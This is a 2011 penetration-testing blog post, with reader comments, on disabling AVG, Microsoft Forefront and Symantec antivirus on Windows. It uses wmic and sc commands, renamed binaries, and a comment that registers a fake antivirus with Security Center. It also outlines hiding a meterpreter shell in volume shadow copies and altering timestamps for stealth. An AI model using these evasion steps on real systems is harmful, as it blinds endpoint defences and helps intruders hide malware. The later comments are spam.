Monday, December 5, 2011

Disabling AntiVirus when Pen Testing

When penetration testing, and targeting Windows systems, writing some executable content to the file system is invariably required at some stage.   Unfortunately today, the antivirus vendors have become quite adept with signatures that match assembly stub routines that are used to inject malware into a system.   The A/V guys will also pick up on common service executable files such as being used with Metasploit’s bypassuac.   Let’s face it, we still need to write stuff into temp directories from time to time.

Mark Baggett, and Tim Tomes recently presented some nice techniques on hiding malware within Windows volume shadow copies  (http://www.irongeek.com/i.php?page=videos/hack3rcon2/tim-tomes-and-mark-baggett-lurking-in-the-shadows).   Since it is unlikely for A/V products to be able to scan volume shadow copies, and the capability to create a process from a volume shadow copy using ‘wmic’ exists, then we would likely want to follow this sequence of tasks during a test:

a) Disable the A/V product of choice.
b) Upload our favorite/useful executable content.  (perhaps a reverse TCP meterpreter shell or similar)
c) Upload Mark and Tim’s excellent vssown.vbs script
a. Enable service and create volume shadow copy.
b. Disable volume shadow copy service.
d) Delete our favorite/useful executable content and modified timestamps accordingly assuming we want to be somewhat stealthy.
e) Execute our content from the volume shadow copy using ‘wmic’ using the excellent vssown script, or just through ‘wmic process call create’.

The challenge presented is whether we can effectively disable the antivirus product of choice.  Listed below are some possible techniques for three popular products which may get us what we need.   None of these techniques are stealthy from a user interface perspective.  Otherwise said, Windows security center and the A/V tray executable files themselves will try to inform the user that something is broken when we proceed with these recipes.


1. Grisoft’s AVG

Using the 2012 Freeware version, I note the following information about AVG.    Services running are the AVG watchdog (avgwd), and the AVG IDS agent (avgidsagent).    The running processes are as follows: avgidsagent.exe, avgwdsvc.exe, avgemca.exe, avgrsa.exe, avgcsrva.exe, and avgnsa.exe.   The watchdog process is very persistent at restarting things, is not killable, and neither is the service stoppable.

DISABLING:
a. Rename the binary files in %systemroot%\program files\avg\avg2012\ as follows.

C:\> cd %systemroot%\program files\avg\avg2012
C:\> move avgcsrva.exe avgcsrva_.exe
C:\> move avgemca.exe avgemca_.exe
C:\> move avgnsa.exe avgnsa_.exe
C:\> move avgrsa.exe avgrsa_.exe

b. Kill the running processes simultaneously with a one line (wildcard powered) wmic command.

C:\>  wmic process where “name like ‘avg[cenr]%.exe’” delete

c. The watchdog service will to restart all of the binaries but fail.

ENABLING: Rename all of the binaries back to their original names, and the watchdog process will take care of the rest.


2. Microsoft Forefront

The service name is “msmpsvc”, and the running processes are msmpeng.exe, and msseces.exe, one being the engine and the other being the GUI reporting/configuration tool respectively.

DISABLING:  kill the GUI tool and stop the A/V engine service.

C:\> wmic process where name=”msseces.exe” delete
C:\> sc stop msmpsvc

ENABLING: start the A/V service engine, and start the GUI process.

C:\> cd \Program Files\Microsoft Security Client
C:\> sc start msmpsvc
C:\> msseces.exe


3. Symantec Endpoint Protection

The services running are ccEvtMgr, ccSetMgr, smcservice, and “Symantec AntiVirus”.   The processes that matter are smb.exe, and smcgui.exe.

DISABLING: kill the processes, and stop the services.   I found that the event manager (ccEvtMgr), and settings manager (ccSetMgr) service can remain running without any impact.

C:\> wmic process where “name like ‘%smc%.exe’” delete
C:\> sc stop smcservice
C:\> sc stop “Symantec AntiVirus”

ENABLING: restarting just the smcservice will start everything else back up again.

C:\> sc start smcservice

5 comments:

mihi said...

To prevent the security center from complaining about your crashed AV, just register a second one via wmic:

wmic /namespace:\\root\securitycenter PATH AntiVirusProduct
CREATE displayName=DummyAV,onAccessScanningEnabled=TRUE,productUptoDate=TRUE


Once you are finished testing, you can delete it again:

wmic /namespace:\\root\securitycenter PATH AntiVirusProduct
WHERE displayname='DummyAV' DELETE

Joff Thyer said...

Nice addition! Thanks.

shaving mirrors said...

Hi, Are you well?

Acceptable material with information of blog.packetheader.net worldwide.It is a awesome web page for of all us.We are getting different kinds of opportunity by this web page.Really I like this web page. It is well designed and effective also it is very useful. I really encounter so fantastic after learning your material AS I like to talk about In the company section Malwarebytes has designed the items as per the needs of the section. As the needs of method and small companies (SMBs) are different from the huge companies, hence they have released items as per the need. They provide the Anti - Viruses foundation with 1-99 permits, preferably best for the needs of SMBs. This is suitable with all recognized Malwarebytes coupon code. It has many innovative functions not available in the Home inclusion to match the needs of SMBs so as to give fantastic rights to details of other important company details from strike of any malware.

Thanks For Very Interesting Post.

sarah lee said...

Your article about the security is lovely


nice Business security systems

cybersecurityinc said...

Nice post, very helpful for us.I will come back here again & again...:)
vulnerability assessment
penetration testing